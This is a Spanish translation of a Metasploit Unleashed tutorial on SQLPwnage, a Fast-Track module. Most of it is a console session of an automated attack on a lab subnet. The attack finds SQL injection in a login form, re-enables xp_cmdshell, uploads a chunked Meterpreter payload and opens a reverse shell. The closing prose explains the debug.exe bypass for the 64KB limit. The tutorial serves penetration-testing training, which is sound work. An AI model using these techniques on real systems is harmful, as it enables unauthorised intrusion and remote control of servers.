SQL PWNAGE
De www.metasploit-es.com.ar
SQL PWNAGE
'SQLPwnage' es una herramienta para la detección de potenciales vulnerabilidades de inyección SQL en una aplicación web. SQLPwnage explorará subredes y rastrear las URL entera en busca de cualquier tipo de parámetros POST. SQLPwnage intentará que se de un error de inyección SQL basada en un intento para tener acceso completo al sistema. Si se puede adivinar la sintaxis SQL apropiada, que hará una serie de ataques como volver a habilitar xp_cmdshell y la entrega de cualquier carga que desee, todo a través de inyección de SQL. Usando el ejemplo de abajo, automáticamente se arrastrará y atacara un sitio que sabemos que es vulnerable a la inyección de SQL. SQLPwnage fue escrito por Andrew Weidenhamer y David Kennedy. Vamos a ver qué pasa.
Fast-Track Main Menu: Fast-Track - Where it's OK to finish in under 3 minutes... Version: v4.0 Written by: David Kennedy (ReL1K) http://www.securestate.com http://www.thepentest.com 1. Fast-Track Updates 2. Autopwn Automation 3. Microsoft SQL Tools 4. Mass Client-Side Attack 5. Exploits 6. Binary to Hex Payload Converter 7. Payload Generator 8. Fast-Track Tutorials 9. Fast-Track Changelog 10. Fast-Track Credits 11. Exit Enter the number: 3 Microsoft SQL Attack Tools Pick a list of the tools from below: 1. MSSQL Injector 2. MSSQL Bruter 3. SQLPwnage Enter your choice : 3 Configuration file not detected, running default path. Recommend running setup.py install to configure Fast-Track. Default Metasploit directory set to /pentest/exploits/framework3/ Checking SQLPwnage dependencies required to run... Dependencies installed. Welcome to SQLPwnage. SQLPwnage written by: Andrew Weidenhamer and David Kennedy SQLPwnage is a mass pwnage tool custom coded for Fast-Track. SQLPwnage will attempt to identify SQL Injection in a website, scan subnet ranges for web servers, crawl entire sites, fuzz form parameters and attempt to gain you remote access to a system. We useunique attacks never performed before in order to bypass the 64kb debug restrictions on remote Windows systems and deploy our large payloads without restrictions This is all done without a stager to download remote files, the only egress connections made are our final payload. Right now SQLPwnage supports three payloads, a reverse tcp shell, metasploit reverse tcp meterpreter, and metasploit reverse vnc inject. Some additional features are, elevation to "sa" role if not added, data execution prevention (DEP) disabling, anti-virus bypassing, and much more! This tool is the only one of its kind, and is currently still in beta. SQLPwnage Main Menu: 1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND) 2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED) 3. SQL Injection single URL exploitation Enter your choice: 2 --------------------------------------------------------------- - This module has the following two options: - - - - 1) Spider a single URL looking for SQL Injection. If - - successful in identifying SQL Injection, it will then - - give you a choice to exploit.- - - - 2) Scan an entire subnet looking for webservers running on - - port 80. The user will then be prompted with two - - choices: 1) Select a website or, 2) Attempt to spider - - all websites that was found during the scan attempting - - to identify possible SQL Injection. If SQL Injection - - is identified, the user will then have an option to - - exploit. - - - - This module is based on error messages that are most - - commonly returned when SQL Injection is prevalent on - - web application. - - - - If all goes well a reverse shell will be returned back to - - the user. - --------------------------------------------------------------- Scan a subnet or spider single URL? 1. url 2. subnet (new) 3. subnet (lists last scan) Enter the Number: 2 Enter the ip range, example 192.168.1.1-254: 10.211.55.1-254 Scanning Complete!!! Select a website to spider or spider all?? 1. Single Website 2. All Websites Enter the Number: 2 Attempting to Spider: http://10.211.55.128 Crawling http://10.211.55.128 (Max Depth: 100000) DONE Found 0 links, following 0 urls in 0+0:0:0 Spidering is complete. ************************************************************************* http://10.211.55.128 ************************************************************************* [+] Number of forms detected: 2 [+] A SQL Exception has been encountered in the "txtLogin" input field of the above website. What type of payload do you want? 1. Custom Packed Fast-Track Reverse Payload (AV Safe) 2. Metasploit Reverse VNC Inject (Requires Metasploit) 3. Metasploit Meterpreter Payload (Requires Metasploit) 4. Metasploit TCP Bind Shell (Requires Metasploit) 5. Metasploit Meterpreter Reflective Reverse TCP 6. Metasploit Reflective Reverse VNC Select your choice: 5 Enter the port you want to listen on: 9090 [+] Importing 64kb debug bypass payload into Fast-Track... [+] [+] Import complete, formatting the payload for delivery.. [+] [+] Payload Formatting prepped and ready for launch. [+] [+] Executing SQL commands to elevate account permissions. [+] [+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+] [+] Delivery Complete. [+] Created by msfpayload (http://www.metasploit.com). Payload: windows/patchupmeterpreter/reverse_tcp Length: 310 Options: LHOST=10.211.55.130,LPORT=9090 Launching MSFCLI Meterpreter Handler Creating Metasploit Reverse Meterpreter Payload.. Taking raw binary and converting to hex. Raw binary converted to straight hex. [+] Bypassing Windows Debug 64KB Restrictions. Evil. [+] [+] Sending chunked payload. Number 1 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 2 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 3 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 4 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 5 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 6 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 7 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 8 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 9 of 9. This may take a bit. [+] [+] Conversion from hex to binary in progress. [+] [+] Conversion complete. Moving the binary to an executable. [+] [+] Splitting the hex into 100 character chunks [+] [+] Split complete. [+] [+] Prepping the payload for delivery. [+] Sending chunk 1 of 3, this may take a bit... Sending chunk 2 of 3, this may take a bit... Sending chunk 3 of 3, this may take a bit... Using H2B Bypass to convert our Payload to Binary.. Running cleanup before launching the payload.... [+] Launching the PAYLOAD!! This may take up to two or three minutes. [+] [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (718347 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1031) meterpreter >
¡Uf! Hecho que parezca fácil ... Fast-Track logró ganar el acceso y la entrega de la carga útil a lo largo de la inyección de SQL! Lo interesante de todo esto es el payload. Una vez que se identifica la inyección de SQL de Fast-Track , toma las opciones especificadas durante la instalación inicial y crea una carga útil de Metasploit como un formato ejecutable. Ese ejecutable se convierte entonces en una versión hexagonal primas, lo que la salida es sólo una gota de recta hexagonal. Una carga de encargo se entrega al equipo de la víctima que es completamente personalizado a Fast-Track, lo que esta carga inicial no es su aplicación una base hexagonal de 5kb, cae la carga útil en el formato hexagecimal en el sistema operativo subyacente y utiliza Windows de depuración para convertir el formato hexadecimal de nuevo a una aplicación basada en binario. La principal limitación de este método es que todas las cargas útiles DEBE estar bajo 64KB de tamaño. Si el payload está sobre el tamaño, se bomba se va hacia afuera y se convierte en una aplicación. Fast-Track's tiene patyload personalizados que pesan (5kb) esencialmente una vez convertido nuevamente en un binario se lee en hexadecimal primas y la convierte a un archivo en un formato binario, evitando así la limitación de 64 KB. Este método fue introducido por primera vez por Scott White, en la Defcon SecureState en 2008 y se ha incorporado al SQLPwnage Fast-Track y los ataques SQLBruter.
© Offensive Security 2009
Original by www.offensive-security.com/metasploit-unleashed/ Traslated by tundervirld
